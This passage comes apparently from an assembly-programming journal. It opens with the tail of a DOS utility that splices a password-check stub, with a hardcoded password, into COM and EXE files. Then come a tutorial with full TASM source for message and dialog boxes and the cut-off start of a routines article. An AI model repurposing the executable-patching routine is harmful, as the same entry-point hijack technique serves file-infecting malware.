;-------------------------------------------------------------------------
READ_PAGE:
         push    ax
         push    cx

         mov     ah, 3Fh
         mov     cx, 512
         int     21h

         pop     cx
         pop     ax

         ret

;-------------------------------------------------------------------------
;Procedure to read a paragraph
;-------------------------------------------------------------------------
READ_PARA:
         push    ax
         push    cx

         mov     ah, 3Fh
         mov     cx, 16
         int     21h

         pop     cx
         pop     ax


         ret

;-------------------------------------------------------------------------
;Procedure to write a page
;-------------------------------------------------------------------------
WRITE_PAGE:
         push    ax
         push    cx
         push    dx

         mov     ah, 40h
         mov     cx, 512
         mov     dx, offset buffer
         int     21h

         pop     dx
         pop     cx
         pop     ax

         ret

;-------------------------------------------------------------------------
;Procedure to write a paragraph
;-------------------------------------------------------------------------
WRITE_PARA:
         push    ax
         push    cx
         push    dx

         mov     ah, 40h
         mov     cx, 16
         mov     dx, offset buffer
         int     21h

         pop     dx
         pop     cx
         pop     ax

         ret

;-------------------------------------------------------------------------
;Procedure to move file pointer back a page
;-------------------------------------------------------------------------
DECFP_PAGE:
         push    ax
         push    cx
         push    dx

         mov     ax, 4201h
         mov     cx, -1
         mov     dx, -512
         int     21h

         pop     dx
         pop     cx
         pop     ax

         ret

;-------------------------------------------------------------------------
;Procedure to move file pointer back a para
;-------------------------------------------------------------------------
DEC_PARA:
         push    ax
         push    cx
         push    dx

         mov     ax, 4201h
         mov     cx, -1
         mov     dx, -16
         int     21h

         pop     dx
         pop     cx
         pop     ax

         ret

;-------------------------------------------------------------------------
;Procedure to move the paragraph buffer to the front
;-------------------------------------------------------------------------
MOVE_PARA:
         push    cx

         mov     si, offset para
         mov     di, offset buffer
         mov     cx, 16
         rep     movsb

         pop     cx

         ret



;-------------------------------------------------------------------------
;Code to add to COM files
;-------------------------------------------------------------------------
COMGUARD:
         call    GET_START

GET_START:
         pop     bp
         sub     bp, offset GET_START

         mov     ah, 9h                  ;DOS print string
         lea     dx, [bp + prompt]       ;Print the password prompt
         int     21h
         lea     di, [bp + guess]
         xor     cx, cx

READLOOP:
         mov     ah, 7h                  ;Read without echo
         int     21h
         inc     cx                      ;Count of characters entered
         stosb                           ;Store guess for comparison later
         cmp     cx, 10                  ;Limit guess to 10 chars including
CR
         je      CHECKPASS
         cmp     al, 13                  ;Quit loop when CR read
         jne     READLOOP

CHECKPASS:
         lea     di, [bp + guess]        ;Setup for passwd checking loop
         lea     si, [bp +passwd]        ;Setup addresses for cmpsb
         xor     cx, cx                  ;Set counter to zero
         cld                             ;Tell cmpsb to increment si and di

CHECKLOOP:
         cmpsb                           ;Compare passwd with guess
         jne     FAIL                    ;Abort program if password is wrong
         inc     cx                      ;Increment counter
         cmp     cx, 8                   ;Only check first 8 chars
         jne     CHECKLOOP               ;Loop until you've read first 8

SUCCESS:
         mov     cx, 5
         cld
         lea     si, [bp + obytes]
         mov     di, 100h
         rep     movsb
         push    100h                    ;return from the jump to execute
         ret                             ;the host program

FAIL:
         mov     ah, 9h                  ;DOS print string
         lea     dx, [bp + badpass]      ;Print bad password msg
         int     21h
         mov     ax, 4C00h
         int     21h

prompt  DB      'password: ','$'
badpass DB      'Invalid password!','$'
passwd  DB      'smcrocks'
guess   DB      10 dup (0)
obytes  DB      0,0,0,0,0

ENDGUARD:


;-------------------------------------------------------------------------
;Code to add to EXE files
;-------------------------------------------------------------------------
EXEGUARD:
         push    ax                      ;Save startup value in ax
         push    ds                      ;Save value of ds
         mov     ax, cs                  ;Put cs into ds and es
         mov     ds, ax
         mov     es, ax
         mov     bp, offset ENDGUARD2 - offset EXEGUARD
         mov     ax, [bp-4]

         mov     ah, 9h                  ;DOS print string
         lea     dx, [bp-57]             ;Print the password prompt
         int     21h
         lea     di, [bp-20]
         xor     cx, cx

EREADLOOP:
         mov     ah, 7h                  ;Read without echo
         int     21h
         inc     cx                      ;Count of characters entered
         stosb                           ;Store guess for comparison later
         cmp     cx, 10                  ;Limit guess to 10 chars including
CR
         je      ECHECKPASS
         cmp     al, 13                  ;Quit loop when CR read
         jne     EREADLOOP

ECHECKPASS:
         lea     di, [bp-20]             ;Setup for passwd checking loop
         lea     si, [bp-28]             ;Setup addresses for cmpsb
         xor     cx, cx                  ;Set counter to zero
         cld                             ;Tell cmpsb to increment si and di

ECHECKLOOP:
         cmpsb                           ;Compare passwd with guess
         jne     EFAIL                   ;Abort program if password is wrong
         inc     cx                      ;Increment counter
         cmp     cx, 8                   ;Only check first 8 chars
         jne     ECHECKLOOP              ;Loop until you've read first 8

ESUCCESS:
         pop     ds
         mov     ax, ds
         mov     es, ax
         pop     ax

         cli
         mov     ss, word ptr cs:[bp-10]
         mov     sp, word ptr cs:[bp-8]
         sti

         xor     cx, cx
         xor     dx, dx
         xor     bp, bp
         xor     si, si
         xor     di, di
         lahf
         xor     ah, ah
         sahf


         jmp     dword ptr cs:[ENDGUARD2-EXEGUARD-6]


EFAIL:
         mov     ah, 9h                  ;DOS print string
         lea     dx, [bp-46]             ;Print bad password msg
         int     21h
         mov     ax, 4C00h
         int     21h

eprompt DB      'password: ','$'
ebadpass DB     'Invalid password!','$'
epasswd DB      'smcrocks'
eguess  DB      10 dup (0)
hosts   DW      0, 0
hostc   DW      0, 0
delta   DW      0

ENDGUARD2:


filter1 DB      '*.com',0
filter2 DB      '*.exe',0
bytes   DB      0,0,0,'CG'
exehead DB      28 dup (0)
buffer  DB      512 dup (0)
para    DB      16 dup (0)
lps     DW      0

END START
---------------------------END
DOSGUARD.ASM------------------------------------



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                              Creating a User-Friendly
Interface
                                              by S Sirajudeen


     Now a days, a programmer of any language has to include user friendly
features in his commercial software, since users desire user friendliness
for easy use. For example, Windows is the most popular OS due to its
Graphical
User Interface.

      For an assembly language programmer who tries to develop a DOS-based
program, it is drudgery and challenging to incorporate even a few basic
features of graphical interface like that of Windows.

      Sometimes, in assembly language, the time taken to develop the core
of a software may be very less than writing code for its user interface. For
instance, assume that we're writing an addition program which displays a
dialog box to input two numbers and displays result in a dialog box.
Here,the
dialog box is the user interface. What we have to do in this program is,
      * Displaying a dialog box.
      * Receiving the numbers to be added as string.
      * Checking the string whether it contains alphabets and graphics
        characters. If so, prompting the user to reenter the numbers.
      * Converting the ASCII digits into binary form.
      * Performing binary multibyte addition..
      * Converting sum which is binary into ASCII digits.
      * Displaying sum in a dialog box.
Our intention is only the addition of two numbers. But we have to spend more
time in the user interface design than for addition.

      As I say these things, you may become frustrated and decide to skip
user
interface design. Still, in developing utilities or packages for commercial
purpose, a programmer will have to do these things to accomodate users. This
is why I present this article.

      This article will focus on user friendly features in DOS text mode.
In DOS text mode, user friendly means features such as menus, message box,
dialog box, list box, text window, radio button, status bar, mouse support
etc.

      In this article, I will cover only an about message box and a dialog
box.
However, knowledge of interrupts (for screen and mouse handling) is
essential,
even for a C/C++ programmer, to incorporate user friendly features in a DOS
based program.

GETTING STARTED:
    Before going on, some things must be cleared.

i) A text can be displayed in one of the following ways
          1) Direct access of video memory
          2) Using INT 21h
          3) Using INT 10h
     In the examples of this article, I have used the function 0Eh of INT 10h
     to display text.

ii)   To make the example programs as straightforward, I have used |, -
     and + as the box characters in the dialog box, since actual box
characters
     are EXTENDED ASCII characters which are not allowed in a text article.

       The content of dialog box is labeled as DIALOG_BOX_TEXT.

       Before compiling this program, in the content of the dialog box,
    PLEASE REPLACE the characters |, - and + with the BOX CHARACTERS which
    are specified below.

    --------------------------------------
     ASCII code      Description
    --------------------------------------
       179           |  Vertical bar

       196          --  Horizontal bar

       218          |   Upper left corner

       191           |  Upper right corner

       192          |_  Lower left corner

       217          _|  Lower right corner
    --------------------------------------

EXAMPLE 1:
      First of all, we're going to put a zooming message box in our program.
It
is an introduction to second example.

     You may be seen that some utlities such as Norton Utilities display
zooming message box to alert users.

     What this program does is
        - n boxes of different size, are continously displayed one after
          another for n seconds each. In this case, each time a box
          which is larger than previous one is displayed.
          It seems like the box is zooming.

          LOGIC:
             Assume that displaying boxes which are larger than previously
          displayed box, means enalarging/zooming the previously displayed
box.
               i) Zoom box by n rows
              ii) Zoom box by n columns
             iii) Zooming box for n times

        - It displays horizontal and vertical shadows for the box
        - Finally displays text within the box

     What you will learn:
        i) Screen handling using BIOS interrupt 10h
       ii) An introduction to learn the second example.

Below is the source code of our simple program.
;;
+------------------------------------------------------------------------+
;; | Program   : MSGBOX.ASM
|
;; | Purpose   : Demonstration program about Message Box
|
;; | Assembler : TASM
|
;;
+------------------------------------------------------------------------+

;; MACROS in this program    : @SetTextMode, @Cursor, @Display, @Window,
@Delay
;; PROCEDURES in this program: Message_box, Window
;;///////////////////////////////////////////////////////////////////////;;
.386
MODEL USE16 TINY     ;; @Always must be TINY model

;;///////////////////////////////////////////////////////////////////////;;
DATASEG              ;; Initialize variables

RED    EQU 4fh       ;; @Color values
BLACK  EQU 0fh
BLUE   EQU 1fh

screen                EQU BLUE
shadow_colour         EQU BLACK
box_background_colour EQU RED

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
nl EQU  0Dh,0Ah
label dialog_box_text
db nl
db nl,'
+-------------------------+--------------------------------------+'
db nl,'      | ::/ \::::::.            |  Program to Display a Message Box
   |'
db nl,'      | :/___\:::::::.          |
   |'
db nl,'      | /|    \::::::::.        |     Written  By  S.SIRAJUDEEN.
   |'
db nl,'      | :|   _/\:::::::::.      |   E-Mail: ssirajudeen@...
   |'
db nl,'      | :| _|\  \::::::::::.    |
   |'
db nl,'      | :::\_____\::::::::::.   |       Published in ASMJOURNAL
   |'
db nl,'      | ::::::::::::::::::::::. | Internet:
asmjournal.freeservers.com |'
db nl,'      |      AsmJournal         |
   |'
db nl,'
+-------------------------+--------------------------------------+'
db nl,'      |  # If you have any comments or suggestions then please email
me|'
db nl,'      |    at ssirajudeen@...
   |'
db nl,'
+----------------------------------------------------------------+'
db nl,nl,nl,nl
count dw $-offset dialog_box_text

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
upper_x equ 08       ;; Upper left corner of the box to be zoomed
upper_y equ 37

lower_x equ 08       ;; Lower right corner of the box to be zoomed
lower_y equ 39

left_x db upper_x    ;; Variables to hold the UPPER LEFT coordinates of the
left_y db upper_y    ;; next box to be displayed

right_x db lower_x   ;; Variables to hold the LOWER RIGHT coordinates of the
right_y db lower_y   ;; next box to be displayed

shadow_vertical_left_x    db upper_x+1 ;; Don't Change!
shadow_vertical_left_y    db lower_y+1 ;; Coordinates to display the
VERTICAL
shadow_vertical_right_x   db lower_x+1 ;; shadow of message box.
shadow_vertical_right_y   db lower_y+2

shadow_horizontal_left_x  db lower_x+1 ;; Don't Change!
shadow_horizontal_left_y  db upper_y+2 ;; Coordinates to display the
HORIZONTAL
shadow_horizontal_right_x db lower_x+1 ;; shadow of message box
shadow_horizontal_right_y db lower_y+2

;;//////////////////////////////////////////////////////////////////////;;
UDATASEG
         DW 100H DUP (?)
MyStack LABEL WORD

;;--------------------------<  @SetTextMode  >------------------------;;
@SetTextMode MACRO
              mov ax,0003h
              int 10h
              ENDM  ;;End of macro

;;----------------------------<  @Cursor  >---------------------------;;
;;PURPOSE : Macro to move cursor
;;SYNTAX  : @Cursor <row>, <col>

@Cursor MACRO ROW,COL
         mov ah,02
         mov bh,00
         mov dh,ROW
         mov dl,COL
         int 10h
         ENDM    ;;End of macro

;;----------------------------<  @Display  >---------------------------;;
;;PURPOSE:   Macro to display a text
;;SYNTAX :   @DISPLAY <text width>, <text address>

@Display MACRO xcount, address
         LOCAL display_text
         mov cx, xcount          ;; Number of characters to be displayed
         mov bx, offset address
display_text:
         mov ah,0Eh              ;; Display the text
         mov al,byte ptr [bx]
         push bx
         mov bh,00
         mov bl,07h
         int 10h

         pop bx
         inc bx                  ;; Point to next character
         loop far ptr cs:display_text
         ENDM    ;;End of macro

;;-----------------------------<  @Window  >----------------------------;;
;;PURPOSE : Macro to display a window with a given color as background
;;SYNTAX  : @window <bacground  color>,
;;                  <Upper letf row of user window>, <Upper left column>,
;;                  <Lower right row of user window>, <Lower right column>

@window MACRO  color, lrow, lcol, rrow, rcol
         mov ah,06
         mov al,00
         mov bh, color     ;; Background Color
         mov ch, lrow
         mov cl, lcol
         mov dh, rrow
         mov dl, rcol
         int 10h
         ENDM    ;;End of macro

;;-----------------------------<  @Delay  >-----------------------------;;
@delay  MACRO
         mov ah,86h       ;; Execute a time delay
         mov dx,4500h ;;9000
         mov cx,0000h
         int 15h
         ENDM    ;;End of macro

;;/////////////////////////  MAIN PROGRAM  /////////////////////////////;;
CODESEG                  ;; This marks the start of executable code
         STARTUPCODE

         mov sp,offset MyStack
         push cs          ;; Initialize segment registers.
         pop ds
         push cs
         pop ss

         mov ah,0Bh       ;; Display screen border in WHITE color
         mov bx,0007h
         int 10h

         call message_box ;; Display the message box

         mov ax,4C00h     ;; Terminate the program.
         int 21h

;;////////////////////////////  Message_box  ///////////////////////////;;
Message_box PROC
         @SetTextMode
         @cursor 00,00                  ;; Position cursor at 00,00.
         @window screen,00,00,24,79     ;; @Clear screen

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
         mov cx,0008h  ;; Don't change!  Calculate how many times to zoom.
zoom:
         push cx       ;; @@Display a window which is zooming.
         call window
         pop cx

         loop zoom

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
         @display count, dialog_box_text

         ret
Message_box ENDP

;;///////////////////////////   Window   ///////////////////////////////;;
Window  PROC
   ;;Display a window with BLUE colour as background.
        @window box_background_colour, left_x, left_y, right_x, right_y

        dec byte ptr left_x
        sub cl,5
        mov byte ptr left_y,cl

        inc byte ptr right_x
        add dl,5
        mov byte ptr right_y,dl

;;---------------------------------------------------------------------;;
   ;;Display a horizontal shadow.
        @window shadow_colour,shadow_vertical_left_x,shadow_vertical_left_y,
                shadow_vertical_right_x,shadow_vertical_right_y

        dec byte ptr shadow_vertical_left_x
        add cl,5
        mov  byte ptr shadow_vertical_left_y,cl

        inc byte ptr shadow_vertical_right_x
        add dl,5
        mov  byte ptr shadow_vertical_right_y,dl

;;--------------------------------------------------------------------;;
   ;;Display a horizontal shadow.
        @window shadow_colour,shadow_horizontal_left_x,
shadow_horizontal_left_y,
                shadow_horizontal_right_x,shadow_horizontal_right_y

        inc byte ptr shadow_horizontal_left_x
        sub cl,5
        mov byte ptr shadow_horizontal_left_y,cl

        inc byte ptr shadow_horizontal_right_x
        add dl,5
        mov byte ptr shadow_horizontal_right_y,dl

;;--------------------------------------------------------------------;;
        @delay

        ret
Window ENDP

END
;;////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\;;

EXAMPLE 2:
     Well, next we're going to put a DIALOG BOX in our program.

     What it does is:
        - Displays a dialog box with YES and NO buttons
        - Supports button selection using mouse
             (i) Checks for mouse installation
            (ii) Shows mouse pointer
           (iii) Captures button click of the left mouse button
        - Checks for keyboard input
           (i) Checks whether EXTENDED keys has pressed
          (ii) Checks whether ENTER or TAB key has pressed
        - Toggles button selection, on presssing TAB, LEFT ARROW key or RIGHT
          ARROW key.
        - On pressing ENTER key or clicking OK/YES button, displays different
          messages according to button selection and terminates.

     What we will learn from this example is:
        (i) Mouse handling
       (ii) Screen handling using BIOS interrupt 10h
      (iii) Key board handling using BIOS interrupt 16h
       (iv) Idea of user interface design

     I made the following program very straightforward and ignored code
optimization to reduce complexity.
;;
+-------------------------------------------------------------------------+
;; | Program   : DLGBOX.ASM
|
;; | Purpose   : Demonstration program about Dialog Box with YES & NO button
|
;; | Features  : Supports mouse for button selection
|
;; | Assembler : TASM
|
;; | Required Knowledge: INT 21h, INT 10h, INT 16h, INT 33h & Scan Code
|
;;
+-------------------------------------------------------------------------+

;; MACROS in this program    : @Cursor, @Display, @window, @Yes  & @No
;; PROCEDURES in this program: Dialog_box
;;///////////////////////////////////////////////////////////////////////;;
.386
MODEL USE16 TINY     ;; @Always must be TINY model

;;///////////////////////////////////////////////////////////////////////;;
DATASEG              ;; Initialize variables

mouse db 'n'         ;; Flag to indicate the availability of mouse

mouse_x db 0         ;; Keep track of position of mouse cursor
mouse_y db 0

m_x dw 00
m_y dw 00

left_mouse_button db 0   ;; Flag updated on clicking the left mouse button

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
RED    EQU 4fh       ;; @Color values
CYAN   EQU 3fh
BLACK  EQU 0fh
BLUE   EQU 1fh
WHITE  EQU 7fh

box_height EQU 10
box_width EQU 46

left_x EQU 7      ;; Upper left corner of user window
left_y EQU 20

right_x EQU left_x+box_height-1 ;; Calculate lower right corner of user
window
right_y EQU left_y+box_width-1

upper_left_row db left_x
upper_left_col db left_y

box_background_color EQU RED ; Background color of dialog box

nl EQU  0Dh,0Ah   ; New line


label dialog_box_text
db '+--------------- USER COMMENT ---------------+' ;Dialog box. The
variable
db '|                                            |' ;dialog_box_text
contains
db '|         Written By S.Sirajudeen            |' ;10 lines; width of each
db '|      E-mail: ssirajudeen@...      |' ;line is 46 characters.
db '|                                            |'
db '|       HAVE YOU ENJOYED THIS PROGRAM?       |' ;NOTE:
db '|                                            |' ;If you edit here, you
db '|              Yes #       No  #             |' ;should UPDATE the
db '|            #######     #######             |' ;text_width and
db '+--------------------------------------------+' ;text_line_count.
count dw $-offset dialog_box_text

text_line_count EQU 10    ;; Variable dialog_box_text contains 10 lines
text_width      EQU 46    ;; and width of each line is 46 characters

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
shadow EQU WHITE              ;; color of button shadow

;;NOTE:  Width of  'yes' and 'yes_button' should be same.
yes_button      db 17,' Yes ',16  ;; Displayed on YES button has selected
yes             db '  Yes  '
yes_horz_shadow db 7 dup(223)
yes_char_count EQU 7

;;NOTE:  Width of 'no' and 'no_button' should be same.
no_button      db 17,'  No ',16   ;; Displayed on NO button has selected
no             db '   No  '
no_horz_shadow db  7 dup(223)
no_char_count  EQU 7

vert_shadow    db 220

yes_x EQU right_x-2           ;; Coordinate where YES button to displayed
yes_y EQU left_y+(box_width/2)-yes_char_count-4 ;;32

no_x  EQU right_x-2           ;; Coordinate where NO button to displayed
no_y  EQU left_y+(box_width/2)+1 ;;44

select   EQU BLUE   ;; @Background color to highlight the button selection
unselect EQU BLACK

button db 'y' ;; @Flag to keep track of the button selection. If the value
               ;; is 'y', the YES button has selected; 'n' for the NO button.

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
label thank_you      ;; Message to be displayed upon YES button has pressed
db 07,'                        Written By S.SIRAJUDEEN',nl
db
'4/55,L.M.BUILDING,KUMARESAPURAM,KUTHAPAR(PO),TRICHY-620013,TAMILNADU,INDIA'
db nl,'                      Email: ssirajudeen@...'
db nl,nl,'                            Thank you! Good-bye!!'
thank_you_count dw $-thank_you

label suggest        ;; Message to be displayed upon NO button has pressed
db 7h,'        If you have any comments or suggestions, then please mail me
at'
db nl,'                               ssirajudeen@...'
db nl
suggest_count dw $-suggest

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
;;  -------------+-----------  When a key has pressed, it returns a code.
;; |Extended Keys| Scan Code | This code is called SCAN CODE.
;; |-------------+-----------| Alphanumeric keys, tab, space and escape
;; | Left Arrow  |    75     | keys return one byte code. But Extended
;; | Right Arrow |    77     | keys return two bytes code. The first byte
;; | Up Arrow    |    72     | always 0. The second is the actual scan code.
;; | Down Arrow  |    80     | Arrow keys, Home, End, PageUp, Page Down,
;;  -------------+-----------  Insert, Delete, Function keys, Pause/break,
;;                             Scroll Lock & Print Screen are called
EXTENDED
;;                             KEYs.
LEFT_ARROW  equ 75  ;; Scan code of LEFT ARROW key is 75
RIGHT_ARROW equ 77  ;;      ,,      RIGHT ARROW keyis 77
TAB_KEY     equ 9   ;; Scan code of TAB key is 9
ENTER_KEY   equ 13  ;;      ,,      ENTER key is 13

;;//////////////////////////////////////////////////////////////////////;;
UDATASEG
         DW 50H DUP (?)
MyStack LABEL WORD

;;----------------------------<  @Cursor  >---------------------------;;
;;PURPOSE : Macro to move cursor
;;SYNTAX  : @Cursor <row>, <col>

@Cursor MACRO ROW,COL
         mov ah,02
         mov bh,00
         mov dh,ROW
         mov dl,COL
         int 10h
         ENDM    ;;End of macro

;;----------------------------<  @Display  >---------------------------;;
;;PURPOSE:   Macro to display a text
;;SYNTAX :   @DISPLAY <text width>, <text address>

@Display MACRO xcount, address
         LOCAL display_text
         mov cx, xcount          ;; Number of characters to be displayed
         mov bx, offset address
display_text:
         mov ah,0Eh              ;; Display the text
         mov al,byte ptr [bx]
         push bx
         mov bh,00
         mov bl,07h
         int 10h

         pop bx
         inc bx                  ;; Point to next character
         loop far ptr cs:display_text
         ENDM    ;;End of macro

;;----------------------------<  @window  >-----------------------------;;
;;PURPOSE : Macro to display a window with a given color as background
;;SYNTAX  : @window <bacground  color>,
;;                  <Upper letf row of user window>, <Upper left column>,
;;                  <Lower right row of user window>, <Lower right column>

@window MACRO  color, lrow,lcol, rrow, rcol
         mov ah,06
         mov al,00
         mov bh, color  ;;Background Color
         mov ch, lrow
         mov cl, lcol
         mov dh, rrow
         mov dl, rcol
         int 10h
         ENDM    ;;End of macro

;;------------------------<  @button_shadow  >--------------------------;;
;;PURPOSE ; Macro to pad the button with horizontal and vertical char to
;;          make it as 3D button.
@button_shadow MACRO
    @Cursor yes_x+1, yes_y+1           ;; Display horizontal shadow of YES
button
    @Display yes_char_count, yes_horz_shadow

    @Cursor yes_x, yes_y+yes_char_count ;; Display vertical shadow
    @Display 1, vert_shadow

    @Cursor no_x+1, no_y+1             ;; Display horizontal shadow of NO
button
    @Display no_char_count, no_horz_shadow

    @Cursor no_x, no_y+no_char_count    ;; Display vertical shadow
    @Display 1, vert_shadow

    ENDM

;;-----------------------------<  @Yes  >-------------------------------;;
;;PURPOSE : Macro to select the YES button.
;;          In other words, a window which is used as YES button is
displayed

@Yes  MACRO
     mov button, 'y'                 ;; DON'T CHANGE! ;  Update flag
     @window select, yes_x, yes_y, yes_x, yes_y+(yes_char_count-1)
     @window unselect, no_x, no_y, no_x, no_y+(no_char_count-1)

     @Cursor yes_x,yes_y                 ;; Move cursor to YES button
     @Display yes_char_count,yes_button  ;; Display label of YES
     @Cursor no_x,no_y                   ;; Move cursor to NO button
     @Display no_char_count, no          ;; Display label of NO button

     ENDM    ;;End of macro

;;-----------------------------<  @No  >--------------------------------;;
;;PURPOSE : Macro to select the NO button
;;          In other words, a window which is used as NO button is displayed

@No  MACRO
     mov button, 'n'                  ;; DON'T CHANGE! ;  Update flag
     @window unselect,yes_x, yes_y, yes_x, yes_y+(yes_char_count-1)
     @window select, no_x, no_y, no_x, no_y+(no_char_count-1)

     @Cursor yes_x,yes_y
     @Display yes_char_count, yes
     @Cursor no_x,no_y
     @Display no_char_count, no_button

     ENDM    ;;End of macro

;;////////////////////////  MAIN PROGRAM   /////////////////////////////;;
CODESEG                   ;;This marks the start of executable code
         STARTUPCODE

         mov sp,offset MyStack
         push cs           ;;Initialize segment registers.
         pop ds
         push cs
         pop ss

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
         @window BLACK, 00, 00, 24, 79     ;;@Clear screen

         call Dialog_box   ;;Display the dialog box

display_thank_u:
         cmp button,'y'    ;; Check whether YES  button has pressed/clicked
         jne display_suggestion

         @Display thank_you_count, thank_you
         jmp _end

display_suggestion:       ;; NO button has pressed/clicked
         @Display suggest_count, suggest

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
_end:
         mov ax,4C00h       ;; Terminate the program.
         int 21h

;;///////////////////////////   Dialog_box   ////////////////////////////;;
Dialog_box PROC
      mov ax,0003 ;; Don't change! Set text mode in 3. Changing this mode
      int 10h     ;; causes different resolution. Mouse movement is converted
                  ;; into rows and columns based on the resolution of text
mode.

      mov ax,00   ;; Reset mouse
      int 33h

      cmp ax,00   ;; Check for error
      je start

      mov ax,01   ;; Show mouse pointer
      int 33h

      mov mouse, 'y'

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
start:
      @window box_background_color,left_x,left_y,right_x,right_y ;;Display a
BOX

      @Cursor left_x,left_y  ;; Move cursor to upper left corner of dialog
box

      mov cx, text_line_count           ;; Display n lines as dialog box text
      mov bx, offset dialog_box_text    ;; Address of text
next_line:
      push bx                           ;; OUTER LOOP
      push cx

            mov cx,00                   ;; INNER LOOP
            mov cl, text_width
display_text:
            mov ah,0Eh                  ;; Display the text
            mov al,byte ptr [bx]
            push bx
            mov bh,00
            mov bl,07h
            int 10h

            pop bx
            inc bx
            loop far ptr cs:display_text ;; INNER LOOP

      pop cx
      pop bx

      mov dx,00               ;; Calculate address of next line
      mov dl, text_width
      add bx, dx

      inc byte ptr upper_left_row

      push bx
      @Cursor upper_left_row, upper_left_col ;; Move cursor to next line
within
      pop bx                                 ;; dialog box
      loop far ptr cs:next_line              ;; OUTER LOOP

      @button_shadow

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
_yes:
      @Yes             ;; Select the YES button

      cmp left_mouse_button,01
      je _end_proc

      jmp mouse_check

_no:
      @No              ;;Select  the NO button

      cmp left_mouse_button,01
      je _end_proc

mouse_check:
      cmp mouse, 'y'  ;; Check whether mouse is available
      jne key_check

      mov ax,03       ;; Get mouse cursor position
      int 33h

      mov left_mouse_button,bl

      mov word ptr m_x,dx
      mov word ptr m_y,cx

mouse_button:
      and left_mouse_button, 01 ;; Check whether left mouse button has
pressed

      cmp left_mouse_button, 01
      jne key_check

mouse_row:
      mov mouse_x,0         ;; Mouse movement is converted into rows and
columns
                            ;; to calculate the position of mouse cursor
      cmp word ptr m_x,00
      je mouse_col

      mov ax,word ptr m_x   ;; In the text mode 3, to calculate the current
ROW,
      mov bl,8              ;; divide the position value for VERTICAL
movement
      div bl                ;; by 8.

      mov mouse_x, al

mouse_col:
      mov  mouse_y,0        ;; Mouse movement is converted into rows and
columns
                            ;; to calculate the position of mouse cursor
      cmp word ptr m_y,00
      je key_check

      mov ax, word ptr m_y  ;; In the text mode 3, to calculate the current
COLUMN,
      mov bl,8              ;; divide the position value for HORIZONTAL
movement
      div bl                ;; by 8.

      mov mouse_y, al

mouse_yes:
      mov al, mouse_x
      cmp al, yes_x      ;; Check whether mouse has clicked anywhere on
      jne  mouse_no      ;; the row where YES button is displayed

      mov al, mouse_y

      cmp al, yes_y
      jb mouse_no

      cmp al, yes_y+(yes_char_count-1)
      ja mouse_no

      mov button, 'y'
      jmp _yes

mouse_no:
      mov al, mouse_x
      cmp al, no_x       ;; Check whether mouse has clicked anywhere on
      jne  key_check     ;; the row where NO button is displayed

      mov al, mouse_y

      cmp al, no_y
      jb key_check

      cmp al, no_y+(no_char_count-1)
      ja key_check

      mov button, 'n'
      jmp _no

key_check:
      mov ah,01           ;; @Check whether any character is in keyboard
buffer
      int 16h
      jz mouse_check
      mov ah,08           ;; @Receive  character without echoing to  screen
      int 21h

      cmp al, TAB_KEY     ;; Check whether TAB key has pressed
      je _left

      cmp al,ENTER_KEY    ;; Check whether ENTER key has pressed.
      je _end_proc        ;; Exit program

      cmp al,00           ;; @Check whether any Extended Key has pressed.
      jne mouse_check
      mov ah,08
      int 21h

      cmp al, LEFT_ARROW  ;; Check whether LEFT ARROW key  has  pressed
      je _left

      cmp al, RIGHT_ARROW ;; Check whether RIGHT ARROW key  has  pressed
      je _right

      jmp  mouse_check

;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;
_left:
      cmp button,'y'
      je _no
      jmp _yes

_right:
      cmp button,'y'
      je _no
      jmp _yes

;;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -;;
_end_proc:

      @Cursor right_x+1, 0    ;; Move cursor below the dialog box

      mov ax,02               ;; Hide mouse cursor
      int 33h

      RET
Dialog_box ENDP              ;; End of procedure

END   ;; End of program
;;////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\;;

Now, we have written a superb user friendly program. If you want to embed
the
above examples in your work, you may have to heavily change these programs,
but the basic principles will be the same.

    Please, e-mail me your comments and suggestions at
ssirajudeen@...



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                             ASM Building
Blocks
                                                             by Laura
Fairhead


     Here are some simple but very powerful library routines, primarily
concerned with screen output. They all follow the same conventions:
   *  Routines preserve all registers that they are not specified to return.
   *  The direction flag (DF) should always be clear before calling.

     All code is presented in MASM format. I do not use very many of the
functions of this assembler so it should be trivial to assemble these under
a different one. I do, however, use OPTION SCOPED, this means that labels
within a PROC block are local to that PROC block (a double colon suffixed
label is given global scope though).

     First come the primitive routines. These are responsible for the actual
output and simply call DOS to do it. The name for this sort of thing is
called a 'wrapper' function. It does nothing in itself except afford a
particular interface to an application. If all your access to the OS is in
a small number of logical wrapper functions then porting your code to other
systems becomes a lot easier.

;pstrcx-    write CX characters to stdout
;           uses DOS function 040h
;
;entry:     DS:SI=string address
;           CX=length of string
;
;exit:      (no parameters are returned)

pstrcx  PROC NEAR

;assume that DOS can't handle a zero-byte write
;(I don't trust those M$ programmers)
         JCXZ don
         PUSH AX
         PUSH BX
         MOV AH,040h
         MOV BX,1            ;stdout is handle #1
         XCHG DX,SI
         INT 021h
         XCHG DX,SI
         POP BX
         POP AX
don:    RET

pstrcx  ENDP

     Note the use of XCHG. XCHG is an extremely useful instruction indeed,
even though there are those who wish to see it's death along with all
those other "horrible, odd-ball, x86 specific". XCHG in essence performs
two operations simultaneously, which is hideously useful considering
